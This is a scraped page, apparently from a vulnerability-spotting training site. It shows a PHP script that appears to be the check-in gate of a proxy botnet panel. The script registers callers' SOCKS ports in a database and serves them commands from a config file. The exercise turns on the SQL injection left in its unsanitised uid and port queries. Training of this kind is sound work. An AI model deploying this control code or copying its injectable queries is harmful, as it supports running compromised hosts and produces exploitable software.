23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153

<?php

// Gettin all information
$id = $_GET['id'];
$httpport = $_GET['httpport'];
$socksport = $_GET['socksport'];
$uptimem = $_GET['uptimem'];
$uptimeh = $_GET['uptimeh'];
$param = $_GET['param'];
$ver = $_GET['ver'];
$uid = $_GET['uid'];
$wm = $_GET['wm'];
$lang = $_GET['lang'];
//$ssip = $_GET['ssip'] ;
$ip = getenv("REMOTE_ADDR");
$real_ip = getenv("HTTP_X_FORWARDED_FOR");
$browser = getenv("HTTP_USER_AGENT");

//Security check
if($ver == ''){
exit;
}

include_once('./mysqllog.php');

//Replace symbols
$id = ereg_replace("<","&#8249",$id);
$id = ereg_replace(">","&#8250",$id);
$id = ereg_replace("\"","&#8221",$id);
$id = ereg_replace(";","",$id);
$id = ereg_replace("%","",$id);
$param = ereg_replace("<","&#8249",$param);
$param = ereg_replace(">","&#8250",$param);
$param = ereg_replace("\"","&#8221",$param);
$param = ereg_replace(";","",$param);
$param = ereg_replace("%","",$param);

$date = date("Y-m-d");
$time=date("H:i:s");
list($year, $month, $day) = explode('-', $date);
$sql_uptime = "$uptimeh:$uptimem";

if($real_ip != "") {
$fp = fsockopen($real_ip,$socksport, $errno, $errstr, 30);
if(!$fp) {
  $okk = false;
} else {
  $okk = true;

  $link = mysql_connect($mysql_host, $mysql_login, $mysql_pass) or die("Could not connect:" . mysql_error());
  mysql_select_db($mysql_db, $link) or die("Could not select:" . mysql_error());
  $query = 'SELECT COUNT(*) FROM socks where uid = "'. $uid .'"';
  $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
  $count = mysql_result($result, 0);
  if ($count == 0) {
   $query = 'INSERT INTO socks VALUES ("'.$uid.'","'. $real_ip . '","'. $httpport .'","'. $socksport . '","'. $sql_uptime .'","'. mktime() .'","0")';
   $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
  } else {
   $query = 'UPDATE socks SET `ip` = "'. $real_ip .'",`hport` = "'. $httpport .'",`sport` = "'. $socksport .'",`uptime` = "'. $sql_uptime .'",`update` = "'. mktime() .'"WHERE `uid` = "'.$uid.'"';
   $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
   $query = 'COMMIT';
   $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
  }
  mysql_close($link);

  //$fh=fopen("logs/P.$day.$month.txt","a+");
  //ip:hport:sport:bport:uptime:uid
  //fputs($fh,"$real_ip@$httpport@$socksport@$param@$uptimeh:$uptimem@$uid\r\n");
  //fclose($fh);
  send_command();
  exit;
}
}

if( ($ip != "") && ($ip != $real_ip) ) {
$fp = fsockopen($ip,$socksport, $errno, $errstr, 30);
if(!$fp) {
  send_command();
  exit;
} else {
  $link = mysql_connect($mysql_host, $mysql_login, $mysql_pass) or die("Could not connect:" . mysql_error());
  mysql_select_db($mysql_db, $link) or die("Could not select:" . mysql_error());
  $query = 'SELECT COUNT(*) FROM socks where uid = "'. $uid .'"';
  $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
  $count = mysql_result($result, 0);
  if ($count == 0) {
   $query = 'INSERT INTO socks VALUES ("'.$uid.'","'. $ip . '","'. $httpport .'","'. $socksport . '","'. $sql_uptime .'","'. mktime() .'","0")';
   $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
  } else {
   $query = 'UPDATE socks SET `ip` = "'. $ip .'",`hport` = "'. $httpport .'",`sport` = "'. $socksport .'",`uptime` = "'. $sql_uptime .'",`update` = "'. mktime() .'"WHERE `uid` = "'.$uid.'"';
   $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
   $query = 'COMMIT';
   $result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());
  }
  mysql_close($link);

  //$fh=fopen("logs/P.$day.$month.txt","a+");
  //ip:hport:sport:bport:uptime:uid
  //fputs($fh,"$ip@$httpport@$socksport@$param@$uptimeh:$uptimem@$uid\r\n");
  //fclose($fh);
  send_command();
  exit;
}
}

send_command();
exit;

function send_command() {
$cmdname="logs/cfg.dat";
$cmduid="logs/uid.ini";

if(filesize("$cmduid") == 0) {
$fh=fopen($cmdname,"r");
$cfgdata=fread($fh,filesize($cmdname));
fclose($fh);
echo "CMND$cfgdata";
exit;
}

$array=file($cmduid);
$kolvo=count($array);
for($ei=0;$ei<$kolvo;$ei++) {
$llen=strlen($array[$ei]);
$llen=$llen-2;
$array[$ei]=substr($array[$ei],0,$llen);
if($array[$ei] == $uid) {
  $fh=fopen($cmdname,"r");
  $cfgdata=fread($fh,filesize($cmdname));
  fclose($fh);
  echo "CMND$cfgdata";
  exit;
}
}
echo "CMND\r\n";
}

?>

Feathers

It is not only fine feathers that make fine birds.
Aesop

SpotTheVuln.com

Search for Vulnerabilities

Popular Vulnerable Code

Links

Boundaries

Floods

Grammys

Writing –Fake XSS + CSRF

Details

Details

Vulnerable Code

Writing

Imagination

Shape

State

Feathers –SQLi

Details

Details

Developers Solution

Feathers

Programming Languages

Popular Vulnerabilities